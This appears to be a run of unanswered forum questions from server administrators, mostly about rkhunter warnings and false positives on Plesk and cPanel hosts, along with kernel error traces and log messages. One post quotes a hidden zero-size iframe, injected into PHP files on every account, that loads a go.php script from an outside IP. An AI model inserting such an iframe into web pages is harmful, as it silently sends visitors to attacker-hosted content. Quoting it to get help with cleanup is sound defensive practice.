I just ran 'rkhunter -c --quiet' and these are the error messages I got:
Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
Some errors has been found while checking. Please perform a manual check on this machine debian
Does anyone know what the following events in /var/log/messages mean? It looks like some sort of failure on the ATA bus. Does the last line mean that it successfully wrote all data using the cache, or could there be data loss?
The output of smartctl looks ok for the disk.
Jul 26 16:44:35 server1 kernel: ata1.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen
Jul 26 16:44:35 server1 kernel: ata1.00: cmd c8/00:08:9d:e2:8a/00:00:00:00:00/ec tag 0 cdb 0x0 data 4096 in
Jul 26 16:44:35 server1 kernel: res 40/00:01:00:4f:c2/00:00:00:00:00/00 Emask 0x4 (timeout)
Jul 26 16:44:42 server1 kernel: ata1: port is slow to respond, please be patient (Status 0xd0)
Jul 26 16:45:05 server1 kernel: ata1: port failed to respond (30 secs, Status 0xd0)
Jul 26 16:45:05 server1 kernel: ata1: soft resetting port
Jul 26 16:45:10 server1 kernel: ata1.00: revalidation failed (errno=-2)
Jul 26 16:45:10 server1 kernel: ata1: failed to recover some devices, retrying in 5 secs
Jul 26 16:45:15 server1 kernel: ata1: soft resetting port
Jul 26 16:45:15 server1 kernel: ata1.00: configured for UDMA/133
Jul 26 16:45:15 server1 kernel: ata1: EH complete
Jul 26 16:45:15 server1 kernel: SCSI device sda: 976773168 512-byte hdwr sectors (500108 MB)
Jul 26 16:45:15 server1 kernel: SCSI device sda: drive cache: write back
Apache seems to have the port blocked. I removed my thumb drive earlier, after successfully using the XAMPP install on it, went somewhere, and then came back, and all of a sudden it will not work. I am getting the error messages below after I push the start button.
I have a Plesk 11.5 server that someone made changes to in IIS to allow web site users to turn the sending of detailed error messages on and off from a web.config file. Unfortunately, now none of the sites will send detailed error messages to the browser no matter what is done. The person that made the changes to IIS did not document them properly and cannot tell me what exactly they changed. None of the obvious settings have had an effect on the problem.
Mar 31 14:56:52 hosting plesk sendmail[1177]: _mh_fork(): Error occured during waiting the child process with pid: 1178: No child processes
Mar 31 14:56:52 hosting plesk sendmail[1177]: Error during 'check-quota' handler
Mar 31 14:56:52 hosting plesk sendmail[1177]: Unable to get sender domain by sender mailname
I have just noticed that for several days I have been constantly receiving these messages in /var/log/messages. I haven't done anything that would invoke them. How can I disable these messages? Are they anything to worry about?
Feb 6 14:28:18 server kernel: [<c014f600>] find_extend_vma+0x12/0x4f
Feb 6 14:28:18 server kernel: [<c0134383>] get_futex_key+0x39/0x108
Feb 6 14:28:18 server kernel: [<c011d305>] finish_task_switch+0x30/0x66
Feb 6 14:28:18 server kernel: [<c02cf618>] schedule+0x844/0x87a
Feb 6 14:28:18 server kernel: [<c027734b>] sys_socketcall+0x1df/0x1fb
Feb 6 14:28:18 server kernel: [<c0125bc5>] sys_gettimeofday+0x53/0xac
Feb 6 14:28:18 server kernel: [<c02d137f>] syscall_call+0x7/0xb
Feb 6 14:28:18 server kernel: [<c02d007b>] _read_lock_irq+0x4/0x1e
Feb 6 14:28:18 server kernel: Badness in dst_release at include/net/dst.h:149
Feb 6 14:28:18 server kernel: [<f8d8a555>] ip6_push_pending_frames+0x340/0x369 [ipv6]
Feb 6 14:28:18 server kernel: [<f8d9883f>] udp_v6_push_pending_frames+0x169/0x185 [ipv6]Badness in dst_release at include/net/dst.h:149
Feb 6 14:28:18 server kernel: [<c0278fa8>]
Feb 6 14:28:18 server kernel: [<f8d98e7d>] udpv6_sendmsg+0x622/0x770 [ipv6]
Feb 6 14:28:18 server kernel: [<c027a498>] __kfree_skb+0x55/0xf7
Feb 6 14:28:18 server kernel: [<c027e1b8>] skb_dequeue+0x40/0x46
Feb 6 14:28:18 server kernel: [<c027b009>] net_tx_action+0x60/0xfc
Feb 6 14:28:18 server kernel: [<c0126354>] skb_recv_datagram+0x61/0x9b
Feb 6 14:28:18 server kernel: [<c02b1ed7>] __do_softirq+0x4c/0xb1
Feb 6 14:28:18 server kernel: [<c010814b>] do_softirq+0x4f/0x56
Feb 6 14:28:18 server kernel: =======================
Feb 6 14:28:18 server kernel: [<c0107a60>] do_IRQ+0x1a2/0x1ae
Feb 6 14:28:18 server kernel: [<c02d1d3c>] udp_recvmsg+0x5f/0x271
Feb 6 14:28:18 server kernel: [<c02b7b35>] common_interrupt+0x18/0x20
Feb 6 14:28:18 server kernel: [<c02d007b>] inet_sendmsg+0x38/0x42
Feb 6 14:28:18 server kernel: [<c02757f5>] _read_lock_irq+0x4/0x1e
Feb 6 14:28:18 server kernel: sock_sendmsg+0xdb/0xf7
Feb 6 14:28:18 server kernel: [<c02757f5>] sock_sendmsg+0xdb/0xf7
Feb 6 14:28:18 server kernel: [<c011fee1>] autoremove_wake_function+0x0/0x2d
Feb 6 14:28:18 server kernel: [<c027a89e>] verify_iovec+0x76/0xc2
Feb 6 14:28:18 server kernel: [<c0276f44>] sys_sendmsg+0x1ee/0x23b
Feb 6 14:28:18 server kernel: [<c011cb7d>] activate_task+0x88/0x95
Feb 6 14:28:18 server kernel: [<c011d00a>] try_to_wake_up+0x225/0x230
Feb 6 14:28:18 server kernel: [<c011d00a>] try_to_wake_up+0x225/0x230
Feb 6 14:28:18 server kernel: [<c0170776>] inode_update_time+0x80/0x87
Feb 6 14:28:18 server kernel: [<c0164748>] pipe_writev+0x310/0x31c
Feb 6 14:28:18 server kernel: [<c02cf622>] schedule+0x84e/0x87a
Feb 6 14:28:18 server kernel: [<c027734b>] sys_socketcall+0x1df/0x1fb
Feb 6 14:28:18 server kernel: [<c0125bc5>] sys_gettimeofday+0x53/0xac
Feb 6 14:28:18 server kernel: [<c02d137f>] syscall_call+0x7/0xb
Feb 6 14:28:18 server kernel: [<c02d007b>] _read_lock_irq+0x4/0x1e
Feb 6 14:28:18 server kernel: Badness in dst_release at include/net/dst.h:149
Feb 6 14:28:18 server kernel: [<f8d98ef7>] udpv6_sendmsg+0x69c/0x770 [ipv6]
Feb 6 14:28:18 server kernel: [<c027a498>] skb_dequeue+0x40/0x46
Feb 6 14:28:18 server kernel: [<c027b009>] skb_recv_datagram+0x61/0x9b
Feb 6 14:28:18 server kernel: [<c02b1ed7>] udp_recvmsg+0x5f/0x271
Feb 6 14:28:18 server kernel: [<c02b7b35>] inet_sendmsg+0x38/0x42
Feb 6 14:28:18 server kernel: [<c02757f5>] sock_sendmsg+0xdb/0xf7
Feb 6 14:28:18 server kernel: [<c02757f5>] sock_sendmsg+0xdb/0xf7
Feb 6 14:28:18 server kernel: [<c011fee1>] autoremove_wake_function+0x0/0x2d
Feb 6 14:28:18 server kernel: [<c027a89e>] verify_iovec+0x76/0xc2
Feb 6 14:28:18 server kernel: [<c0276f44>] sys_sendmsg+0x1ee/0x23b
Feb 6 14:28:18 server kernel: [<c011cb7d>] activate_task+0x88/0x95
Feb 6 14:28:18 server kernel: [<c011d00a>] try_to_wake_up+0x225/0x230
Feb 6 14:28:18 server kernel: [<c011d00a>] try_to_wake_up+0x225/0x230
Feb 6 14:28:18 server kernel: [<c0170776>] inode_update_time+0x80/0x87
Feb 6 14:28:18 server kernel: [<c0164748>] pipe_writev+0x310/0x31c
Feb 6 14:28:18 server kernel: [<c02cf622>] schedule+0x84e/0x87a
Feb 6 14:28:18 server kernel: [<c027734b>] sys_socketcall+0x1df/0x1fb
Feb 6 14:28:18 server kernel: [<c0125bc5>] sys_gettimeofday+0x53/0xac
Feb 6 14:28:18 server kernel: [<c02d137f>] syscall_call+0x7/0xb
Feb 6 14:28:18 server kernel: [<c02d007b>] _read_lock_irq+0x4/0x1e
about my rkhunter's log. It gives some warnings, but I don't know if they are really important ones.
Here are the warnings it gives:
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/poppassd_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/smtps_psa
Warning: The SSH configuration option 'PermitRootLogin' has not been set. The default value may be 'yes', to allow root access.
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Application 'gpg', version '1.2.6', is out of date, and possibly a security risk.
Warning: Application 'openssl', version '0.9.7a', is out of date, and possibly a security risk.
Warning: Application 'php', version '4.3.9', is out of date, and possibly a security risk.
I am using Plesk, and I am using yum update for updating files and scripts, so I don't know how I can update gpg, php and openssl. Also, for some time it said that port 2006 is open and a possible trojan backdoor, but when I check now it doesn't give any error like that.
Is there any major problem in those logs or not?
If someone wants, I can attach the full rkhunter.log or only the warning output from rkhunter.log.
I've honestly never had to worry about protecting myself from exploits until this week, when I found out somebody gained access to the server using an old script on an old account (teach me to delete client accounts when they leave me, it did!).
I'm working on a new server and going through lots of posts on better securing it, and two things that are suggested are installing chkrootkit and rkhunter and adding them to the daily cron jobs. I learned how to install and set up the daily script for chkrootkit, but here's what I'd like to do that I'm not sure how to go about: I'd like to a) be notified ONLY if there are changes in the daily scans (especially since there are a couple of false positives I'm aware of) and b) be e-mailed a full report once a week, whether or not there were any changes.
I've got rkhunter installed as well, but I can't seem to find a script that will properly execute it and e-mail the result to me. Does anybody have one that works? I'd also like to only get an e-mail if there are changes, except for a once-weekly scan result.
I have run rkhunter and got the following report. I have checked everything and it seems to be fine. Also, I have run rkhunter --update and it didn't help. How can I remove these BAD messages? Do I need to reinstall the package?
/bin/dmesg [ BAD ]
/bin/env [ BAD ]
/bin/grep [ BAD ]
/bin/kill [ BAD ]
/bin/login [ BAD ]
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Same result in two different RHE 4 boxes... Just to verify that this is a false positive, do you have the same results in your RHE 4 boxes while running "rkhunter -c"?
Checking rkhunter version...
  This version : 1.3.2
  Latest version: 1.3.2
[ Rootkit Hunter version 1.3.2 ]

Checking rkhunter data files...
  Checking file mirrors.dat [ No update ]
  Checking file programs_bad.dat [ No update ]
  Checking file backdoorports.dat [ No update ]
  Checking file suspscan.dat [ No update ]
  Checking file i18n/cn [ No update ]
  Checking file i18n/en [ No update ]
  Checking file i18n/zh [ No update ]
  Checking file i18n/zh.utf8 [ No update ]

Warning: Checking for preload file [ Warning ]
Warning: Found library preload file: /etc/ld.so.preload
Warning: The file properties have changed:
         File: /bin/ps
         Current hash: 36f3d8a9fcaebf5838e5e55ebdcac7e355477343
         Stored hash : 8f1acf237e562043f8353f4ec5d0c3490c0d0cb3
         Current inode: 1228803    Stored inode: 1228857
         Current size: 61364    Stored size: 67088
         Current file modification time: 1214487892
         Stored file modification time : 1195262225
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The file properties have changed:
         File: /usr/bin/top
         Current hash: 15f1f743d73d9546a05a15644816139de7708327
         Stored hash : 5e78fb7f0a02643a91964081ca03316dbaf01bdd
         Current inode: 246165    Stored inode: 245920
         Current size: 48536    Stored size: 48504
         Current file modification time: 1214487892
         Stored file modification time : 1195262225
Warning: The file properties have changed:
         File: /usr/bin/vmstat
         Current hash: 898351bc3be226caf6915715b23a1c7cc5d35fdd
         Stored hash : edaa64f3921a0a2d873c14a5eb641ba883f4dcff
         Current inode: 246561    Stored inode: 246020
         Current size: 17872    Stored size: 20444
         Current file modification time: 1214487892
         Stored file modification time : 1195262225
Warning: The file properties have changed:
         File: /usr/bin/w
         Current hash: 480c2c2e4f1048e19fc075f4daebe79fa84e08d1
         Stored hash : 87f39eeb583bc7f6622e95fd0266f093ed8b362b
         Current inode: 246020    Stored inode: 246167
         Current size: 9720    Stored size: 11720
         Current file modification time: 1214487892
         Stored file modification time : 1195262225
Warning: The file properties have changed:
         File: /usr/bin/watch
         Current inode: 246167    Stored inode: 245924
         Current file modification time: 1214487892
         Stored file modification time : 1195262225
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: The file properties have changed:
         File: /sbin/sysctl
         Current hash: b560099caf18d28bcc0249efaec75dcddb87b219
         Stored hash : fa13202ac5897d9f7198e8afbbe7d0c835b07639
         Current inode: 589893    Stored inode: 589875
         Current size: 9144    Stored size: 11048
         Current file modification time: 1214487892
         Stored file modification time : 1195262225
I know some of these warnings, like /usr/bin/GET, groups, ldd, whatis, ifdown and ifup, are normal false positives.
But the other warnings are new.
I think they changed after upgrading cPanel to 11.23. I have cPanel on CentOS 4.6.
I don't have much knowledge of server management. Well, I have a question: after a scan, rkhunter shows that it found two vulnerable applications, but I'm unable to get the names of the files which are vulnerable. How do I find out their names?
rkhunter -c output:
Default logfile will be used (/var/log/rkhunter.log).
Default temporary directory will be used (/usr/local/rkhunter/lib/rkhunter/tmp).
Default database directory will be used (/usr/local/rkhunter/lib/rkhunter/db).
The internationalisation directory does not exist: /usr/local/rkhunter/lib/rkhunter/db/i18n
CentOS
I have a major problem with iframes being injected into every file (header.php, footer.php, index.php, login.php and vars.php) on all server accounts.
<iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
What is the reason and how do I fix that?
And I have a second problem: the rkhunter warnings. I am not sure if they are related to the first problem. rkhunter results:
Checking system commands...

  Performing 'strings' command checks
    Checking 'strings' command [ OK ]

  Performing 'shared libraries' checks
    Checking for preloading variables [ None found ]
    Checking for preload file [ Not found ]
    Checking LD_LIBRARY_PATH variable [ Not found ]

  Performing file properties checks
    Checking for prerequisites [ Warning ]
    /bin/awk [ OK ]
    /bin/basename [ OK ]
    /bin/bash [ OK ]
    /bin/cat [ OK ]
    /bin/chmod [ OK ]
    /bin/chown [ OK ]
    /bin/cp [ OK ]
    /bin/csh [ OK ]
    /bin/cut [ OK ]
    /bin/date [ OK ]
    /bin/df [ OK ]
    /bin/dmesg [ OK ]
    /bin/echo [ OK ]
    /bin/ed [ OK ]
    /bin/egrep [ OK ]
    /bin/env [ OK ]
    /bin/fgrep [ OK ]
    /bin/grep [ OK ]
    /bin/kill [ OK ]
    /bin/login [ OK ]
    /bin/ls [ OK ]
    /bin/mail [ OK ]
    /bin/mktemp [ OK ]
    /bin/more [ OK ]
    /bin/mount [ OK ]
    /bin/mv [ OK ]
    /bin/netstat [ OK ]
    /bin/passwd [ OK ]
    /bin/ps [ OK ]
    /bin/pwd [ OK ]
    /bin/rpm [ OK ]
    /bin/sed [ OK ]
    /bin/sh [ OK ]
    /bin/sort [ OK ]
    /bin/su [ OK ]
    /bin/touch [ OK ]
    /bin/uname [ OK ]
    /bin/gawk [ OK ]
    /bin/tcsh [ OK ]
    /usr/bin/awk [ OK ]
    /usr/bin/chattr [ OK ]
    /usr/bin/curl [ OK ]
    /usr/bin/cut [ OK ]
    /usr/bin/diff [ OK ]
    /usr/bin/dirname [ OK ]
    /usr/bin/du [ OK ]
    /usr/bin/env [ OK ]
    /usr/bin/file [ OK ]
    /usr/bin/find [ OK ]
    /usr/bin/GET [ Warning ]
    /usr/bin/groups [ Warning ]
    /usr/bin/head [ OK ]
    /usr/bin/id [ OK ]
    /usr/bin/kill [ OK ]
    /usr/bin/killall [ OK ]
    /usr/bin/last [ OK ]
    /usr/bin/lastlog [ OK ]
    /usr/bin/ldd [ Warning ]
    /usr/bin/less [ OK ]
    /usr/bin/locate [ OK ]
    /usr/bin/logger [ OK ]
    /usr/bin/lsattr [ OK ]
    /usr/bin/lynx [ OK ]
    /usr/bin/md5sum [ OK ]
    /usr/bin/newgrp [ OK ]
    /usr/bin/passwd [ OK ]
    /usr/bin/perl [ OK ]
    /usr/bin/pstree [ OK ]
    /usr/bin/readlink [ OK ]
    /usr/bin/runcon [ OK ]
    /usr/bin/sha1sum [ OK ]
    /usr/bin/size [ OK ]
    /usr/bin/slocate [ OK ]
    /usr/bin/stat [ OK ]
    /usr/bin/strace [ OK ]
    /usr/bin/strings [ OK ]
    /usr/bin/sudo [ OK ]
    /usr/bin/tail [ OK ]
    /usr/bin/test [ OK ]
    /usr/bin/top [ OK ]
    /usr/bin/tr [ OK ]
    /usr/bin/uniq [ OK ]
    /usr/bin/users [ OK ]
    /usr/bin/vmstat [ OK ]
    /usr/bin/w [ OK ]
    /usr/bin/watch [ OK ]
    /usr/bin/wc [ OK ]
    /usr/bin/wget [ OK ]
    /usr/bin/whatis [ Warning ]
    /usr/bin/whereis [ OK ]
    /usr/bin/which [ OK ]
    /usr/bin/who [ OK ]
    /usr/bin/whoami [ OK ]
    /usr/bin/gawk [ OK ]
    /sbin/chkconfig [ OK ]
    /sbin/depmod [ OK ]
    /sbin/ifconfig [ OK ]
    /sbin/ifdown [ Warning ]
    /sbin/ifup [ Warning ]
    /sbin/init [ OK ]
    /sbin/insmod [ OK ]
    /sbin/ip [ OK ]
    /sbin/lsmod [ OK ]
    /sbin/modinfo [ OK ]
    /sbin/modprobe [ OK ]
    /sbin/nologin [ OK ]
    /sbin/rmmod [ OK ]
    /sbin/runlevel [ OK ]
    /sbin/sulogin [ OK ]
    /sbin/sysctl [ OK ]
    /sbin/syslogd [ OK ]
    /usr/sbin/adduser [ OK ]
    /usr/sbin/chroot [ OK ]
    /usr/sbin/groupadd [ OK ]
    /usr/sbin/groupdel [ OK ]
    /usr/sbin/groupmod [ OK ]
    /usr/sbin/grpck [ OK ]
    /usr/sbin/kudzu [ OK ]
    /usr/sbin/lsof [ OK ]
    /usr/sbin/prelink [ OK ]
    /usr/sbin/pwck [ OK ]
    /usr/sbin/tcpd [ OK ]
    /usr/sbin/useradd [ OK ]
    /usr/sbin/userdel [ OK ]
    /usr/sbin/usermod [ OK ]
    /usr/sbin/vipw [ OK ]
    /usr/sbin/xinetd [ OK ]
    /usr/local/bin/perl [ OK ]
    /usr/local/bin/rkhunter [ OK ]

Checking for rootkits...

  Performing check of known rootkit files and directories
    55808 Trojan - Variant A [ Not found ]
    ADM Worm [ Not found ]
    AjaKit Rootkit [ Not found ]
    aPa Kit [ Not found ]
    Apache Worm [ Not found ]
    Ambient (ark) Rootkit [ Not found ]
    Balaur Rootkit [ Not found ]
    BeastKit Rootkit [ Not found ]
    beX2 Rootkit [ Not found ]
    BOBKit Rootkit [ Not found ]
    CiNIK Worm (Slapper.B variant) [ Not found ]
    Danny-Boy's Abuse Kit [ Not found ]
    Devil RootKit [ Not found ]
    Dica-Kit Rootkit [ Not found ]
    Dreams Rootkit [ Not found ]
    Duarawkz Rootkit [ Not found ]
    Enye LKM [ Not found ]
    Flea Linux Rootkit [ Not found ]
    FreeBSD Rootkit [ Not found ]
    ****`it Rootkit [ Not found ]
    GasKit Rootkit [ Not found ]
    Heroin LKM [ Not found ]
    HjC Kit [ Not found ]
    ignoKit Rootkit [ Not found ]
    ImperalsS-FBRK Rootkit [ Not found ]
    Irix Rootkit [ Not found ]
    Kitko Rootkit [ Not found ]
    Knark Rootkit [ Not found ]
    Li0n Worm [ Not found ]
    Lockit / LJK2 Rootkit [ Not found ]
    Mood-NT Rootkit [ Not found ]
    MRK Rootkit [ Not found ]
    Ni0 Rootkit [ Not found ]
    Ohhara Rootkit [ Not found ]
    Optic Kit (Tux) Worm [ Not found ]
    Oz Rootkit [ Not found ]
    Phalanx Rootkit [ Not found ]
    Phalanx Rootkit (strings) [ Not found ]
    Portacelo Rootkit [ Not found ]
    R3dstorm Toolkit [ Not found ]
    RH-Sharpe's Rootkit [ Not found ]
    RSHA's Rootkit [ Not found ]
    Scalper Worm [ Not found ]
    Sebek LKM [ Not found ]
    Shutdown Rootkit [ Not found ]
    SHV4 Rootkit [ Not found ]
    SHV5 Rootkit [ Not found ]
    Sin Rootkit [ Not found ]
    Slapper Worm [ Not found ]
    Sneakin Rootkit [ Not found ]
    Suckit Rootkit [ Not found ]
    SunOS Rootkit [ Not found ]
    SunOS / NSDAP Rootkit [ Not found ]
    Superkit Rootkit [ Not found ]
    TBD (Telnet BackDoor) [ Not found ]
    TeLeKiT Rootkit [ Not found ]
    T0rn Rootkit [ Not found ]
    Trojanit Kit [ Not found ]
    Tuxtendo Rootkit [ Not found ]
    URK Rootkit [ Not found ]
    VcKit Rootkit [ Not found ]
    Volc Rootkit [ Not found ]
    X-Org SunOS Rootkit [ Not found ]
    zaRwT.KiT Rootkit [ Not found ]

  Performing additional rootkit checks
    Suckit Rookit additional checks [ OK ]
    Checking for possible rootkit files and directories [ None found ]
    Checking for possible rootkit strings [ None found ]

  Performing malware checks
    Checking running processes for suspicious files [ None found ]
    Checking for login backdoors [ None found ]
    Checking for suspicious directories [ None found ]
    Checking for sniffer log files [ None found ]

  Performing trojan specific checks
    Checking for enabled xinetd services [ None found ]
    Checking for Apache backdoor [ Not found ]

  Performing Linux specific checks
    Checking kernel module commands [ OK ]
    Checking kernel module names [ OK ]

Checking the network...

  Performing check for backdoor ports
    Checking for UDP port 2001 [ Not found ]
    Checking for TCP port 2006 [ Not found ]
    Checking for TCP port 2128 [ Not found ]
    Checking for TCP port 14856 [ Not found ]
    Checking for TCP port 47107 [ Not found ]
    Checking for TCP port 60922 [ Not found ]

  Performing checks on the network interfaces
    Checking for promiscuous interfaces [ None found ]

Checking the local host...

  Performing system boot checks
    Checking for local host name [ Found ]
    Checking for local startup files [ Found ]
    Checking local startup files for malware [ None found ]
    Checking system startup files for malware [ None found ]

  Performing group and account checks
    Checking for passwd file [ Found ]
    Checking for root equivalent (UID 0) accounts [ None found ]
    Checking for passwordless accounts [ None found ]
    Checking for passwd file changes [ None found ]
    Checking for group file changes [ None found ]
    Checking root account shell history files [ OK ]

  Performing system configuration file checks
    Checking for SSH configuration file [ Found ]
    Checking if SSH root access is allowed [ Warning ]
    Checking if SSH protocol v1 is allowed [ Warning ]
    Checking for running syslog daemon [ Found ]
    Checking for syslog configuration file [ Found ]
    Checking if syslog remote logging is allowed [ Not allowed ]

  Performing filesystem checks
    Checking /dev for suspicious file types [ None found ]
    Checking for hidden files and directories [ Warning ]

Checking application versions...

  Checking version of Exim MTA [ OK ]
  Checking version of GnuPG [ Warning ]
  Checking version of Apache [ Skipped ]
  Checking version of Bind DNS [ OK ]
  Checking version of OpenSSL [ Warning ]
  Checking version of PHP [ OK ]
  Checking version of Procmail MTA [ OK ]
  Checking version of OpenSSH [ OK ]
How do I fix rkhunter reporting 'Not found' for local files and 'Unknown' for Exim and PHP 5.2.5?
System checks
* Allround tests
Checking hostname... Found. Hostname is
Checking for passwordless user accounts... OK
Checking for differences in user accounts... OK. No changes.
Checking for differences in user groups... OK. No changes.
Checking boot.local/rc.local file...
- /etc/rc.local [ OK ]
- /etc/rc.d/rc.local [ OK ]
- /usr/local/etc/rc.local [ Not found ]
- /usr/local/etc/rc.d/rc.local [ Not found ]
- /etc/conf.d/local.start [ Not found ]
- /etc/init.d/boot.local [ Not found ]

* Application version scan
- Exim MTA 4.68 [ Unknown ]
- GnuPG 1.2.6 [ Old or patched version ]
- Apache [unknown] [ OK ]
- Bind DNS 9.2.4 [ OK ]
- OpenSSL 0.9.7a [ Old or patched version ]
- PHP 5.2.5 [ Unknown ]
- PHP 5.2.5 [ Unknown ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.9p1 [ OK ]
I enabled rkhunter in Plesk 12 to check the system weekly. I get a warning now, which I never got in older versions of Plesk:
The current hash function (/usr/bin/sha1sum) or package manager (DPKG) is incompatible with the hash function (Unset) or package manager (Unset) used to store the values.
Debian 7.6 x64